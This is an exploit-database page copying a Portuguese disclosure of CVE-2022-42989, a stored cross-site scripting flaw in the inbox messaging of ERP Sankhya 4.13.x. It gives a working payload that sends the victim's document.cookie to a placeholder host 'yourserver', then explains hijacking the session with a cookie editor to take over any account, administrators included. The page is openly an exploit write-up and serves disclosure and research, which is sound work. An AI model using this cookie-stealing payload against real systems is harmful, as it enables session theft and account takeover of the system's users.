Advertisement






ERP Sankhya 4.13.x Cross Site Scripting

CVE Category Price Severity
CVE-2022-42989 CWE-79 Not disclosed High
Author Risk Exploitation Type Date
Not specified High Remote 2022-10-26
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100067

Below is a copy:

ERP Sankhya 4.13.x Cross Site Scripting
# Exploit Title: ERP Sankhya - XSS to Account Takeover
# Google Dork: N/A
# Date: 19/10/2022
# Exploit Author: Lucas Alves Da Cunha - (0xLucas)
# Vendor Homepage: https://www.sankhya.com.br
# Version: Sankhya Om <= 4.13.x
# Tested on: Sankhya Om 4.11
# CVE: CVE-2022-42989

# Descrio: 
Um usurio comum no ERP Sankhya pode enviar uma mensagem para qualquer outro usurio do sistema inclusive administradores, atravs da funo "Caixa de Entrada". No corpo da mensagem, podemos injetar cdigos html/javascript levando para um cross site scripting.

Payload para verificar existncia da vulnerabilidade:
<img src=1 onerror=alert(1)>

Payload utilizado para capturar os dados da sesso do usurio:
<img src=1 onerror=document.location="http://yourserver/?cookie="+document.cookie>

# Passos para reproduo:
1 - Encontrando a funcionalidade: https://i.imgur.com/B9SWknH.png

2 - Enviando payload para verificar existncia da vulnerabilidade: https://i.imgur.com/ZKSkLmx.png
2.1 - Vulnerabilidade comprovada: https://i.imgur.com/1KiAa1m.png

3 - Explorando a vulnerabilidade: https://i.imgur.com/n8Jevum.png
3.1 - Sesso capturada: https://i.imgur.com/aDatjyN.png

Podemos utilizar os dados da sesso capturada e manipular a sesso utilizando a ferramenta: Cookie-Editor do Google Chrome, e assim entraremos na sesso do usurio desejado. Conforme a imagem a seguir: https://i.imgur.com/L10Yf9f.png

# Impacto:
Explorando essa vulnerabilidade, podemos comprometer qualquer conta de usurio do sistema, desde uma simples conta at mesmo uma conta de administrador do sistema, causando assim um grande impacto de negcio.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum